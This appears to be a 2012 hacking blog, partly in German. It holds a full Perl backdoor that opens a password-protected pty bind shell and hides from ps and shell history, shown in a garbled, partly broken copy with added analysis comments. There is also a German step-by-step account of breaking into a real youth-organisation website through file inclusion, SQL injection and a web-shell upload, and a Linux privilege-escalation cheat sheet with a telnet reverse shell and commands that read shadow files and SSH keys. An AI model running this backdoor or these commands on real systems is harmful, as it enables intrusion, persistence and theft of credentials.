learn online with video tutorials…

Posted in Uncategorized on April 24, 2012 by peak

IT hardware basics:
http://www.professormesser.com/free-a-plus-training/220-701/professor-messers-free-220-70x-comptia-a-training-course/

IT network basics:
http://www.professormesser.com/n10-005/free-network-plus/

IT security basics:
http://www.professormesser.com/free-comptia-security-training/security-plus-videos/

Windows basics:
http://www.professormesser.com/microsoft-70-680/free-microsoft-70-680-training/

Mathematics & Physics:
http://www.khanacademy.org/

Learn Programming in c,obj-c,c++,c#,java
http://www.wibit.net/


Perl Backdoor with pty

Posted in r00ting on April 17, 2012 by peak

#!/usr/bin/perl
#
# Advanced perl backdoor
#
# Analysis notes (review): a password-protected TCP bind shell that gives each
# authenticated client its own pty-backed /bin/sh. Annotated so the sample can
# be read and detected, not deployed. The published listing is damaged by HTML
# extraction: ASCII quotes appear as typographic quotes (‚ ‘ „ “), and the
# angle-bracket reads (<IOD>, <STDIN>) and one for-loop header were stripped,
# so it does not compile as shown.
#
use warnings;
use strict;
use IO::Socket;
use IO::Select;
use POSIX;

# Default listening port; the first command-line argument overrides it (below).
my $PORT = 18082;
# $PASSWORD is a traditional crypt(3) hash. telnet_parse checks
# crypt($input, $PASSWORD) eq $PASSWORD, so the first two characters of the
# stored value act as the salt. (The original comment held the one-liner that
# generated it.)
my $PASSWORD = ‚pawQj8NmTbBGI‘;
my $SHELL = „/bin/sh“;
my $HOME = „/tmp“;
my $PROC = „/bin/sh“;   # fake process name, assigned to $0 below
my $PROMPT = „P-> „;    # sent right after connect, before authentication
my @STTY = (’sane‘, ‚echoe‘, ‚echoctl‘, ‚echoke‘, ‚-ixany‘);   # applied to the slave tty in the child before exec

# Environment inherited by the spawned shell. Detection-relevant: HISTFILE is
# /dev/null so no shell history is written, USER/LOGNAME are forced to "root"
# regardless of the real uid, and HOME is /tmp.
$ENV{HOME} = $HOME;
$ENV{PS1} = ‚\u@\h:\w\$ ‚;
$ENV{PATH} = ‚/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin:/usr/ucb‘;
$ENV{HISTFILE} = ‚/dev/null‘;
$ENV{USER} = ‚root‘;
$ENV{LOGNAME} = ‚root‘;
$ENV{LS_OPTIONS} = ‚ –color=auto -F -b -T 0‘;
$ENV{LS_COLORS} = ‚LS_COLORS=no=00:fi=00:di=01;34:ln=01;36:pi=40;33:so=01;35:do=01;35:bd=40;33;01:cd=40;33;01:or=40;31;01:su=37;41:sg=30;43:tw=30;42:ow=34;42:st=37;44:ex=01;32:*.tar=01;31:*.tgz=01;31:*.arj=01;31:*.taz=01;31:*.lzh=01;31:*.zip=01;31:*.z=01;31:*.Z=01;31:*.gz=01;31:*.bz2=01;31:*.deb=01;31:*.rpm=01;31:*.jar=01;31:*.jpg=01;35:*.jpeg=01;35:*.gif=01;35:*.bmp=01;35:*.pbm=01;35:*.pgm=01;35:*.ppm=01;35:*.tga=01;35:*.xbm=01;35:*.xpm=01;35:*.tif=01;35:*.tiff=01;35:*.png=01;35:*.mov=01;35:*.mpg=01;35:*.mpeg=01;35:*.avi=01;35:*.fli=01;35:*.gl=01;35:*.dl=01;35:*.xcf=01;35:*.xwd=01;35:*.flac=01;35:*.mp3=01;35:*.mpc=01;35:*.ogg=01;35:*.wav=01;35:‘;
$ENV{SHELL} = $SHELL;
$ENV{TERM} = ‚xterm‘;

# Rewrite argv[0] so ps/top show "/bin/sh" instead of the script path.
$0 = $PROC.““;

# SIGHUP and SIGTERM are ignored (SIGKILL still works); children are reaped
# on SIGCHLD.
$SIG{HUP} = ‚IGNORE‘;
$SIG{TERM} = ‚IGNORE‘;
$SIG{CHLD} = sub { wait; };

# Fallback ioctl request numbers (the Linux x86 values), used when no header
# defines them.
my %IOCTLDEF;
$IOCTLDEF{TIOCSWINSZ} = 0x5414;
$IOCTLDEF{TIOCNOTTY} = 0x5422;
$IOCTLDEF{TIOCSCTTY} = 0x540E;

#
# BSD
#
# Try the .ph headers first; safeload() silently skips any that are absent.
safeload(’sys/ttycom.ph‘, 1);
safeload(’sys/ioctl.ph‘, 1);
safeload(‚asm/ioctls.ph‘, 1);

# For each ioctl name that is not yet defined as a constant sub, scrape its
# value out of the Linux header with a string eval; otherwise fall back to
# %IOCTLDEF. As published, defined() has lost its argument and the <IOD> read
# inside while() is missing (extraction damage).
foreach my $IOCTL (keys(%IOCTLDEF)) {
next if (defined());
#
# linux
#
if (open(IOD, „< /usr/include/asm/ioctls.h")) {
while() {
#if (/^#defines+$IOCTLs+(.*?)n$/) {
if (/^#define\s+$IOCTL\s+(.*?)\n$/) {
eval „sub $IOCTL () {$1;}“;
last;
}
}
close(IOD);
}
eval „sub $IOCTL () { $IOCTLDEF{$IOCTL};}“ unless (defined());
}

#
# NO DEFAULT PORT
#
# First argument overrides the port; no validation is done on it.
$PORT = $ARGV[0] if ($ARGV[0]);

# Listen on all interfaces (no LocalAddr), then detach: fork and let the
# parent exit, so the listener keeps running in the background child.
my $bind = IO::Socket::INET->new(Listen=>1, LocalPort=>$PORT, Proto=>“tcp“) or die „$!“;

defined(my $pid = fork)
or die „$!“;
exit if $pid;

# Per-connection state, keyed by the stringified socket handle:
#   senha ("password" in Portuguese) = 0 until authenticated, 1 afterwards
#   sock  = the client socket, buf = pending pre-auth input, shell = pty master
my %CLIENT;
my $sel_serv = IO::Select->new($bind);
my $sel_shell = IO::Select->new();

#
# MAIN LOOP
#
# Poll the listener/clients and the shell ptys; sleep 300 ms per iteration
# while no client is connected.
while (1) {
select(undef,undef,undef, 0.3) if (scalar(keys(%CLIENT)) == 0);
read_clients();
read_shells();
}

# Service every handle in the server select set (the listener plus all
# client sockets) that is readable within 10 ms.
sub read_clients {
map { read_client($_) } ($sel_serv->can_read(0.01));
}

# Pump output from every pty master that is readable within 10 ms back to
# its client.
sub read_shells {
map { read_shell($_) } ($sel_shell->can_read(0.01));
}

# Handle one readable handle from the server set.
#
# If it is the listener: accept, register the new socket as unauthenticated,
# send three telnet IAC WILL options (3, 5, 1: suppress-go-ahead, status,
# echo), sleep one second (this stalls the whole event loop), then send the
# prompt. Note autoflush(1) is set on $fh, the listener, not on $newcon.
#
# Otherwise: read up to 1024 bytes; a zero-length read means the peer closed,
# anything else is passed to telnet_parse. An undef return from sysread is
# not checked and would warn on the == 0 comparison.
sub read_client {
my $fh = shift;
if ($fh eq $bind) {
my $newcon = $bind->accept;
$sel_serv->add($newcon);
$CLIENT{$newcon}->{senha} = 0;
$CLIENT{$newcon}->{sock} = $newcon;
$fh->autoflush(1);
do_client($newcon, ‚3‘, ‚5‘, ‚1‘);
sleep(1);
write_client($newcon, $PROMPT) if ($PROMPT);
} else {
my $msg;
my $nread = sysread($fh, $msg, 1024);
if ($nread == 0) {
close_client($fh);
} else {
telnet_parse($fh, $msg);
}
}
}

# Interpret a chunk of client input.
#
# A chunk whose first byte is IAC (255) is telnet negotiation -> chr_parse.
# Before authentication, input is buffered until a line ending arrives; CR,
# LF and NUL are stripped and the line is compared as crypt($pass, $PASSWORD)
# against the stored hash. A wrong password closes the socket with no reply;
# a correct one flips senha to 1 and spawns the shell. After authentication
# the chunk is normalised (CRLF -> LF, NULs dropped) and written to the pty.
#
# Extraction damage: the regexes have lost their backslashes (/r|n/ was
# /\r|\n/, s/0//g was s/\0//g, s/rn/n/g was s/\r\n/\n/g, and so on), so as
# printed they would strip literal letters instead of control characters.
sub telnet_parse {
my ($cli, $msg) = @_;
my $char = (split(“, $msg))[0];
if (ord($char) == 255) {
chr_parse($cli, $msg);
} else {
if ($CLIENT{$cli}->{senha} == 0) {
$CLIENT{$cli}->{buf} .= $msg;
return() unless ($msg =~ /r|n/);
my $pass = $CLIENT{$cli}->{buf};
$CLIENT{$cli}->{buf} = “;
$pass =~ s/n//g;
$pass =~ s/0//g;
$pass =~ s/r//g;
if (crypt($pass, $PASSWORD) ne $PASSWORD) {
close_client($cli);
} else {
$CLIENT{$cli}->{senha} = 1;
write_client($cli, „\r\n\r“);
new_shell($cli);
}
return();
}
$msg =~ s/rn00//g;
$msg =~ s/0//g;
$msg =~ s/rn/n/g;
write_shell($cli, $msg);
}
}

# Forward up to 1024 bytes of pty-master output to the owning client.
#
# The owner is found by a linear scan of %CLIENT comparing the stored shell
# handle; under `use warnings` this compares undef for clients that have no
# shell yet. Only an undef (error) return from sysread closes the client; a
# zero-length read (EOF after the shell exits) is passed on as an empty
# write, so a dead shell is not torn down here.
sub read_shell {
my $shell = shift;
my $cli;
map { $cli = $CLIENT{$_}->{sock} if ($CLIENT{$_}->{shell} eq $shell) } keys(%CLIENT);
my $msg;
my $nread = sysread($shell, $msg, 1024);
unless (defined $nread) {
close_client($cli);
} else {
write_client($cli, $msg);
}
}

# Turn a space-separated list of byte values ("255 251 1") back into the
# corresponding string of characters. Not referenced anywhere else in the
# published listing. (The empty-string initialiser was garbled to a
# typographic quote by extraction.)
sub to_chr {
my $chrs = “;
map { $chrs .= chr($_) } (split(/ +/, shift));
return($chrs);
}

# Send one telnet "IAC WILL <option>" (255 251 n) to the client for each
# option number in @codes.
sub do_client {
my ($client, @codes) = @_;
map { write_client($client, chr(255).chr(251).chr($_)) } @codes;
}

# Handle telnet negotiation bytes from a client.
#
# The chunk is rendered as space-separated decimal byte values. A NAWS
# subnegotiation (255 250 31 w_hi w_lo h_hi h_lo) is packed in reverse byte
# order into a struct winsize and applied to the client's pty master with
# TIOCSWINSZ; the reversal only yields (rows, cols) on a little-endian host,
# and the ioctl result is ignored. If NAWS arrives before authentication,
# {shell} is still undef. Then every "IAC WILL x" from the client is
# answered with "IAC DO x".
#
# Extraction damage: the (d+) groups were (\d+); as printed they would match
# the letter d.
sub chr_parse {
my ($client, $chrs) = @_;
my $ords = “;
map { $ords .= ord($_).‘ ‚ } (split(//, $chrs));
my $msg = “;

if ($ords =~ /255 250 31 (d+) (d+) (d+) (d+)/) {
my $winsize = pack(‚C4‘, $4, $3, $2, $1);
ioctl($CLIENT{$client}->{shell}, &TIOCSWINSZ, $winsize);# or die „$!“;
}

foreach my $code (split(„255 „, $ords)) {
if ($code =~ /(d+) (.*)$/) {
my $codes = $2;
if ($1 == 251) {
$msg .= chr(255).chr(253);
map { $msg .= chr($_) } (split(/ +/, $codes));
}
}
}
write_client($client, $msg) if ($msg);
return(1);
}

# Spawn a pty-backed shell for an authenticated client.
#
# Parent (the listener process): setpgid(0,0) on itself, grab a BSD-style
# pty pair via open_tty, fork. After the fork it closes the slave, unbuffers
# and raw-modes the master, stores it as {shell} and adds it to the shell
# select set.
#
# Child: close the master, detach from any controlling terminal (TIOCNOTTY
# on /dev/tty), setsid(), make the slave the controlling tty (TIOCSCTTY),
# dup the slave onto the standard handles, apply @STTY with stty, chdir to
# $HOME and exec $SHELL with the forged %ENV from the top of the file. If
# exec fails it falls back to reading lines and running each one through
# system() with a shell (the input is the client's, by design).
#
# finish_client() is called on failure but is not defined anywhere in the
# published listing. Extraction damage: the "<&" mode of the STDIN dup is
# missing (only "&" remains), the STDOUT dup line appears to have been lost
# with it, and the <STDIN> read in the fallback while() is gone.
sub new_shell {
my $cli = shift;
POSIX::setpgid(0, 0);
my ($tty, $pty);
unless (($tty, $pty) = open_tty($cli)) {
finish_client($cli, „ERROR: No more pty’s avaliable\n“);
return(undef);
}
my $pid = fork();
if (not defined($pid)) {
finish_client($cli, „ERROR: fork()\n“);
return(undef);
}
unless($pid) {
close($pty);
local(*DEVTTY);
if (open (DEVTTY, „/dev/tty“)) {
ioctl(DEVTTY, &TIOCNOTTY, 0 );# or die „$!“;
close(DEVTTY);
}
POSIX::setsid();
ioctl($tty, &TIOCSCTTY, 0);# or die „$!“;

open (STDIN, „&“.fileno($tty)) or die „$!“;
open (STDERR, „>&“.fileno($tty)) or die „$!“;
close($tty);
sleep(1);
foreach my $stty („/bin/stty“, „/usr/bin/stty“) {
next unless (-x $stty);
map { system(„$stty“, $_) } @STTY;
}

chdir(„$HOME“);
{ exec(„$SHELL“) };
while (my $msg = ) {
$msg =~ s/n$//;
$msg =~ s/r$//;
system(„$msg 2>&1“);
}
exit;
}
close($tty);
select($pty); $|++;
select(STDOUT);
set_raw($pty);
$CLIENT{$cli}->{shell} = $pty;
$sel_shell->add($pty);
return(1);
}

# Put a handle into raw mode via POSIX::Termios: all input, output and local
# flags cleared, VMIN=1/VTIME=0 so reads return as soon as one byte is
# available. Returns 1 immediately for non-ttys, undef if any termios step
# fails, 1 on success. The ($) prototype only affects parsing, not checking.
sub set_raw($) {
my $self = shift;
return 1 if not POSIX::isatty($self);
my $ttyno = fileno($self);
my $termios = new POSIX::Termios;
unless ($termios) {
return undef;
}
unless ($termios->getattr($ttyno)) {
return undef;
}
$termios->setiflag(0);
$termios->setoflag(0);
$termios->setlflag(0);
$termios->setcc(&POSIX::VMIN, 1);
$termios->setcc(&POSIX::VTIME, 0);
unless ($termios->setattr($ttyno, &POSIX::TCSANOW)) {
return undef;
}
return 1;
}

# Find a free legacy BSD pty pair by brute force.
#
# Two package globs named after the client handle ("pty.<sock>", "tty.<sock>")
# are used as filehandles, hence `no strict`. The loop walks the
# /dev/pty?? / /dev/tty?? names produced by get_tty, opens the master with
# "+>" and then the matching slave; on slave failure the master is closed and
# the next index is tried. Returns (slave, master), or an empty list if none
# opened. Only /dev/ptyXX names are tried, never /dev/ptmx, so hosts that
# provide Unix98 ptys only will always get the "No more pty's" error.
#
# Extraction damage: the for-loop condition/increment and the master open
# ("$i $pty" is what remains of `$i < N; $i++) { ... open($PTY, "+> $pty")`)
# were eaten by the HTML extractor.
sub open_tty {
no strict;
my $cli = shift;
my ($PTY, $TTY) = (*{„pty.$cli“}, *{„tty.$cli“});
for (my $i=0; $i $pty“));
my $tty = get_tty($i, „/dev/tty“);
unless(open($TTY, „+> $tty“)) {
close($PTY);
next;
}
return($TTY, $PTY);
}
return();
}

# Build the n-th BSD-style terminal device name from a base such as
# "/dev/tty" or "/dev/pty": the high nibble of $num picks the letter
# (p..z then a..e), the low nibble the hex digit, e.g. 0 -> "/dev/ttyp0",
# 17 -> "/dev/ttyq1". The @series[...] / @subs[...] forms are one-element
# slices and trigger a "better written as $series[...]" warning.
sub get_tty {
my ($num, $base) = @_;
my @series = (‚p‘ .. ‚z‘, ‚a‘ .. ‚e‘);
my @subs = (‚0‘ .. ‚9‘, ‚a‘ .. ‚f‘);
my $buf = $base;
$buf .= @series[($num >> 4) & 0xF];
$buf .= @subs[$num & 0xF];
return($buf);
}

# Best-effort loader that never dies.
#
# $module is converted to a relative path (Foo::Bar -> Foo/Bar). With
# $require true, every @INC directory that contains the file gets a string
# eval of `require "<dir>/<file>"`, errors discarded. Otherwise ".pm" is
# appended unless the name already ends in .pm/.ph and a string eval of
# `use $module $arg` is returned if the file exists in some @INC directory.
# The callers only pass constant names, so the string evals see no external
# input. Extraction damage: `s/::///g` was `s/::/\//g`.
sub safeload {
my ($module, $require, $arg) = @_;
my $file = $module;
$file =~ s/::///g;
if ($require) {
map { eval („require \“$_/$file\“;“) if(-f „$_/$file“); } @INC;
} else {
$file .= „.pm“ unless ($file =~ /(.pm|.ph)$/);
return(eval(„use $module $arg;“)) if (grep { -f „$_/$file“ } @INC);
}
return;
}

# Write client input to the client's pty master in 20-character pieces,
# draining shell output (read_shells) before and after each piece so the
# echo keeps up. Returns undef if the client has no shell yet, 1 otherwise.
sub write_shell {
my ($cli, $msg) = @_;
my $shell = $CLIENT{$cli}->{shell};
return(undef) unless($shell);
foreach my $m (split_chars($msg, 20)) {
read_shells();
print $shell $m;
read_shells();
}
return(1);
}

# split_chars($msg, $nchars): chop $msg into a list of $nchars-character
# strings (the last one shorter), used by write_shell.
#
# Extraction damage: the line `last if (length($splited) {sock};` is where
# the rest of split_chars (the `< $nchars` comparison, the push and the
# return) and the head of the next sub, close_client, were fused together -
# the extractor dropped everything between a "<" and the next ">". The tail
# from `$sel_serv->remove($sock)` onwards is close_client($cli): remove the
# socket from the server select set, remove and close the pty master if one
# exists, close the socket and delete the client's state.
sub split_chars {
no warnings;
my ($msg, $nchars) = @_;
my @splited;
my @chrs = split (“, $msg);
my $done = 0;
while (1) {
my $splited = join(“, @chrs[$done .. ($done+$nchars-1)]);
$done += $nchars;
last if (length($splited) {sock};

$sel_serv->remove($sock);
if ($CLIENT{$cli}->{shell}) {
my $shell = $CLIENT{$cli}->{shell};
$sel_shell->remove($shell);
close($shell);
}
$sock->close() if($sock);
delete($CLIENT{$cli});
}

# Unbuffered write of $msg to the client's socket; silently does nothing if
# the client has no socket recorded. The syswrite result (short write or
# error) is not checked.
sub write_client {
my ($cli, $msg) = @_;
my $sock = $CLIENT{$cli}->{sock};
syswrite($sock, $msg, length($msg)) if ($sock);
}

post exploitation pty shell

Posted in r00ting on März 5, 2012 by peak

python:

python -c 'import pty; pty.spawn("/bin/bash");'

expect:

#!/usr/bin/expect
# Spawn a shell, then allow the user to interact with it.
# The new shell will have a good enough TTY to run tools like ssh, su and login.
# `interact` returns (and the script ends) once the spawned shell exits.
spawn sh
interact

sh-3.2$ expect sh.exp

Hacking jusos aus dem Saarland

Posted in PHP Injection on Februar 15, 2012 by peak
http://bildung.jusos-saar.de/?file=

Ich werde mich stichwortartig kurz halten, wie ich vorgegangen bin.

1. Safe-Mode-Restriction (PHP safe_mode) erkannt
2. Restriction auf den Ordner /var/www/web53/html/
3. trotzdem Logfiles getestet, um sicherzugehen, sowie einige Config-Files und Sessions -> Fehlanzeige
4. php://input-Wrapper probiert
5. php://filter mit Base64-Encoding erfolgreich auf die index.php angewendet
6. Base64 decodiert, Source der index.php gelesen -> db_oeffnen.inc.php gefunden
7. db_oeffnen.inc.php ebenfalls über den Filter included und Base64 decodiert
8. das hier gefunden:

$host=“localhost“;
$dbuser=“web53″;
$dbpwd=“zensiert“;
$dbname=“usr_web53_2″;

9. nmap-Scan des Servers -> 3306/tcp open mysql
10. versucht, mit dem MySQL-Client auf den Server zu verbinden -> Fehlanzeige
11. dasselbe über SSH versucht
12. SQLi-Lücke auf der Seite gesucht und nach 10 Sekunden gefunden
13. über die SQLi-Lücke ein INTO OUTFILE versucht, aber Quotes werden escaped (vermutlich magic_quotes), also funktioniert das auch nicht
14. User registriert, konnte aber nicht aktiviert werden
15. per SQLi Admin-Tabelle etc. ausgelesen
16. Admin-MD5-Hash mit einem bekannten Online-MD5-Cracker geknackt
16. Admin-Login gesucht und mich nicht austricksen lassen: /admin/ -> Fail, /admin/login.php -> Treffer
17. Admin-Bereich nach Upload-Möglichkeiten durchsucht
18. nach ein paar Versuchen gemerkt, dass das Panel so verbuggt ist, dass es dadurch wieder sicher ist
19. meinen registrierten User aktiviert und im User-Panel nach einer Upload-Möglichkeit gesucht, nichts gefunden
20. Source-Code über die LFI angeschaut und den Fehler gesucht
21. gemerkt, dass es am Safe Mode liegt
22. phpMyAdmin gesucht
23. unter phpmyadmin.jusos-saar.de das Hosting-Panel gefunden
24. Login-Daten aus der Source genommen -> funktioniert.
25. ein bisschen umgeschaut …
26. per WebFTP eine Shell hochgeladen
27. erkannt, dass 10 Domains auf dem Server liegen, dazu Zugriff auf alle Mails der örtlichen Jusos, FTP und so weiter …
28. Januar 2012 Monthly Totals: Visits: 10158, Hits: 199200
29. Passwort in diesem Beitrag zensiert
30. neue E-Mail-Adresse erstellt
31. über WebMail den Admin sowie das Büro informiert

Basic Linux Privilege Escalation

Posted in r00ting on Januar 31, 2012 by peak

The following article is from g0tmi1k! I don't take any credit. Visit his blog: http://g0tmi1k

 
Before starting, I would like to point out – I'm no expert. As far as I know, there isn't a "magic" answer in this huge area. This is simply my findings, typed up, to be shared (my starting point). Below is a mixture of commands that do the same thing, look at things in a different place or just in a different light. I know there are more "things" to look for. It's just a basic & rough guide. Not every command will work on each system, as Linux varies so much. "It" will not jump off the screen – you have to hunt for that "little thing", as "the devil is in the detail".

Enumeration is the key.
(Linux) privilege escalation is all about:

Collect – Enumeration, more enumeration and some more enumeration.
Process – Sort through the data, analyse and prioritise.
Search – Know what to search for and where to find the exploit code.
Adapt – Customize the exploit so it fits. Not every exploit works for every system "out of the box".
Try – Get ready for (lots of) trial and error.

Operating System
What’s the distribution type? What version?
cat /etc/issue
cat /etc/*-release
cat /etc/lsb-release
cat /etc/redhat-release

What’s the Kernel version? Is it 64-bit?
cat /proc/version
uname -a
uname -mrs
rpm -q kernel
dmesg | grep Linux
ls /boot | grep vmlinuz-

What can be learnt from the environmental variables?
cat /etc/profile
cat /etc/bashrc
cat ~/.bash_profile
cat ~/.bashrc
cat ~/.bash_logout
env
set

Is there a printer?
lpstat -a

Applications & Services
What services are running? Which service has which user privilege?
ps aux
ps -ef
top
cat /etc/service

Which service(s) are being run by root? Of these services, which are vulnerable – it's worth a double check!
ps aux | grep root
ps -ef | grep root

What applications are installed? What version are they? Are they currently running?
ls -alh /usr/bin/
ls -alh /sbin/
dpkg -l
rpm -qa
ls -alh /var/cache/apt/archives
ls -alh /var/cache/yum/

Any of the service(s) settings misconfigured? Are any (vulnerable) plugins attached?
cat /etc/syslog.conf
cat /etc/chttp.conf
cat /etc/lighttpd.conf
cat /etc/cups/cupsd.conf
cat /etc/inetd.conf
cat /etc/apache2/apache2.conf
cat /etc/my.conf
cat /etc/httpd/conf/httpd.conf
cat /opt/lampp/etc/httpd.conf
ls -aRl /etc/ | awk '$1 ~ /^.*r.*/' 2>/dev/null    # files readable by anyone

What jobs are scheduled?
crontab -l
ls -alh /var/spool/cron
ls -al /etc/ | grep cron
ls -al /etc/cron*
cat /etc/cron*
cat /etc/at.allow
cat /etc/at.deny
cat /etc/cron.allow
cat /etc/cron.deny
cat /etc/crontab
cat /etc/anacrontab
cat /var/spool/cron/crontabs/root

Any plain text usernames and/or passwords?
grep -i user [filename]
grep -i pass [filename]
grep -C 5 „password“ [filename]
find . -name "*.php" -print0 | xargs -0 grep -i -n 'var $password'   # Joomla (single quotes, so the shell does not expand $password)

Communications & Networking
What NIC(s) does the system have? Is it connected to another network?
/sbin/ifconfig -a
cat /etc/network/interfaces
cat /etc/sysconfig/network

What are the network configuration settings? What can you find out about this network? DHCP server? DNS server? Gateway?
cat /etc/resolv.conf
cat /etc/sysconfig/network
cat /etc/networks
iptables -L
hostname
dnsdomainname

What other users & hosts are communicating with the system?
lsof -i
lsof -i :80
grep 80 /etc/services
netstat -antup
netstat -antpx
netstat -tulpn
chkconfig –list
chkconfig –list | grep 3:on
last
w

What's cached? IP and/or MAC addresses
arp -e
route
/sbin/route -nee

Is packet sniffing possible? What can be seen? Listen to live traffic
# tcpdump tcp dst [ip] [port] and tcp dst [ip] [port]
tcpdump tcp dst 192.168.1.7 80 and tcp dst 10.2.2.222 21

Have you got a shell? Can you interact with the system?
# http://lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/
nc -lvp 4444    # Attacker. Input (Commands)
nc -lvp 4445    # Attacker. Output (Results)
telnet [attacker ip] 4444 | /bin/sh | telnet [attacker ip] 4445    # On the target system. Both ports are the attacker's listeners above

Is port forwarding possible? Redirect and interact with traffic from another view
# rinetd
# http://www.howtoforge.com/port-forwarding-with-rinetd-on-debian-etch

# fpipe
# FPipe.exe -l [local port] -r [remote port] -s [local port] [local IP]
FPipe.exe -l 80 -r 80 -s 80 192.168.1.7

# ssh -[L/R] [local port]:[remote ip]:[remote port] [local user]@[local ip]
ssh -L 8080:127.0.0.1:80 root@192.168.1.7    # Local Port
ssh -R 8080:127.0.0.1:80 root@192.168.1.7    # Remote Port

# mknod backpipe p ; nc -l -p [remote port] < backpipe  | nc [local IP] [local port] >backpipe
mknod backpipe p ; nc -l -p 8080 < backpipe | nc 10.1.1.251 80 >backpipe    # Port Relay
mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow 1>backpipe    # Proxy (Port 80 to 8080)
mknod backpipe p ; nc -l -p 8080 0<backpipe | tee -a inflow | nc localhost 80 | tee -a outflow & 1>backpipe    # Proxy monitor (Port 80 to 8080)

Is tunnelling possible? Send commands locally, remotely
ssh -D 127.0.0.1:9050 -N [username]@[ip]
proxychains ifconfig

Confidential Information & Users
Who are you? Who is logged in? Who has been logged in? Who else is there? Who can do what?
id
who
w
last
cat /etc/passwd | cut -d: -f1    # List of users
grep -v -E "^#" /etc/passwd | awk -F: '$3 == 0 { print $1}'   # List of super users
awk -F: '($3 == "0") {print}' /etc/passwd   # List of super users
cat /etc/sudoers
sudo -l

What sensitive files can be found?
cat /etc/passwd
cat /etc/group
cat /etc/shadow
ls -alh /var/mail/

Anything "interesting" in the home directory(ies)? If it's possible to access them
ls -ahlR /root/
ls -ahlR /home/

Are there any passwords in; scripts, databases, configuration files or log files? Default paths and locations for passwords
cat /var/apache2/config.inc
cat /var/lib/mysql/mysql/user.MYD
cat /root/anaconda-ks.cfg

What has the user been doing? Is there any password in plain text? What have they been editing?
cat ~/.bash_history
cat ~/.nano_history
cat ~/.atftp_history
cat ~/.mysql_history
cat ~/.php_history

What user information can be found?
cat ~/.bashrc
cat ~/.profile
cat /var/mail/root
cat /var/spool/mail/root

Can private-key information be found?
cat ~/.ssh/authorized_keys
cat ~/.ssh/identity.pub
cat ~/.ssh/identity
cat ~/.ssh/id_rsa.pub
cat ~/.ssh/id_rsa
cat ~/.ssh/id_dsa.pub
cat ~/.ssh/id_dsa
cat /etc/ssh/ssh_config
cat /etc/ssh/sshd_config
cat /etc/ssh/ssh_host_dsa_key.pub
cat /etc/ssh/ssh_host_dsa_key
cat /etc/ssh/ssh_host_rsa_key.pub
cat /etc/ssh/ssh_host_rsa_key
cat /etc/ssh/ssh_host_key.pub
cat /etc/ssh/ssh_host_key

File Systems
Which configuration files can be written in /etc/? Able to reconfigure a service?
ls -aRl /etc/ | awk '$1 ~ /^.*w.*/' 2>/dev/null     # Anyone
ls -aRl /etc/ | awk '$1 ~ /^..w/' 2>/dev/null        # Owner
ls -aRl /etc/ | awk '$1 ~ /^.....w/' 2>/dev/null     # Group
ls -aRl /etc/ | awk '$1 ~ /w.$/' 2>/dev/null          # Other

find /etc/ -readable -type f 2>/dev/null                         # Anyone
find /etc/ -readable -type f -maxdepth 1 2>/dev/null   # Anyone

What can be found in /var/ ?
ls -alh /var/log
ls -alh /var/mail
ls -alh /var/spool
ls -alh /var/spool/lpd
ls -alh /var/lib/pgsql
ls -alh /var/lib/mysql
cat /var/lib/dhcp3/dhclient.leases

Any settings/files (hidden) on website? Any settings file with database information?
ls -alhR /var/www/
ls -alhR /srv/www/htdocs/
ls -alhR /usr/local/www/apache22/data/
ls -alhR /opt/lampp/htdocs/
ls -alhR /var/www/html/

Is there anything in the log file(s) (Could help with „Local File Includes“!)
# http://www.thegeekstuff.com/2011/08/linux-var-log-files/
cat /etc/httpd/logs/access_log
cat /etc/httpd/logs/access.log
cat /etc/httpd/logs/error_log
cat /etc/httpd/logs/error.log
cat /var/log/apache2/access_log
cat /var/log/apache2/access.log
cat /var/log/apache2/error_log
cat /var/log/apache2/error.log
cat /var/log/apache/access_log
cat /var/log/apache/access.log
cat /var/log/auth.log
cat /var/log/chttp.log
cat /var/log/cups/error_log
cat /var/log/dpkg.log
cat /var/log/faillog
cat /var/log/httpd/access_log
cat /var/log/httpd/access.log
cat /var/log/httpd/error_log
cat /var/log/httpd/error.log
cat /var/log/lastlog
cat /var/log/lighttpd/access.log
cat /var/log/lighttpd/error.log
cat /var/log/lighttpd/lighttpd.access.log
cat /var/log/lighttpd/lighttpd.error.log
cat /var/log/messages
cat /var/log/secure
cat /var/log/syslog
cat /var/log/wtmp
cat /var/log/xferlog
cat /var/log/yum.log
cat /var/run/utmp
cat /var/webmin/miniserv.log
cat /var/www/logs/access_log
cat /var/www/logs/access.log
ls -alh /var/lib/dhcp3/
ls -alh /var/log/postgresql/
ls -alh /var/log/proftpd/
ls -alh /var/log/samba/
# auth.log, boot, btmp, daemon.log, debug, dmesg, kern.log, mail.info, mail.log, mail.warn, messages, syslog, udev, wtmp

If commands are limited, can you break out of the "jail" shell?
python -c 'import pty;pty.spawn("/bin/bash")'
echo os.system(‚/bin/bash‘)
/bin/sh -i

How are file-systems mounted?
mount
df -h

Are there any unmounted file-systems?
cat /etc/fstab

What "Advanced Linux File Permissions" are used? Sticky bits, SUID & SGID
find / -perm -1000 -type d 2>/dev/null    # Sticky bit – Only the owner of the directory or the owner of a file can delete or rename here
find / -perm -g=s -type f 2>/dev/null    # SGID (chmod 2000) – run as the  group, not the user who started it.
find / -perm -u=s -type f 2>/dev/null    # SUID (chmod 4000) – run as the  owner, not the user who started it.

find / \( -perm -g=s -o -perm -u=s \) -type f 2>/dev/null    # SGID or SUID (the parentheses matter: without them -type f only applies to the SUID side)
for i in `locate -r "bin$"`; do find $i \( -perm -4000 -o -perm -2000 \) -type f 2>/dev/null; done    # Looks in 'common' places: /bin, /sbin, /usr/bin, /usr/sbin, /usr/local/bin, /usr/local/sbin and any other *bin, for SGID or SUID (Quicker search)

# find starting at root (/), SGID or SUID, not Symbolic links, only 3 folders deep, list with more detail and hide any errors (e.g. permission denied)
find / -maxdepth 3 \( -perm -g=s -o -perm -4000 \) ! -type l -exec ls -ld {} \; 2>/dev/null

Where can written to and executed from? A few ‚common‘ places: /tmp, /var/tmp, /dev/shm
find / -writable -type d 2>/dev/null        # world-writeable folders
find / -perm -222 -type d 2>/dev/null      # world-writeable folders
find / -perm -o+w -type d 2>/dev/null    # world-writeable folders

find / -perm -o+x -type d 2>/dev/null    # world-executable folders

find / \( -perm -o+w -perm -o+x \) -type d 2>/dev/null   # world-writeable & executable folders

Any "problem" files? World-writeable files, files with no owner
find / -xdev -type d \( -perm -0002 -a ! -perm -1000 \) -print   # world-writeable directories without the sticky bit
find /dir -xdev \( -nouser -o -nogroup \) -print   # files with no valid owner or group

Preparation & Finding Exploit Code
What development tools/languages are installed/supported?
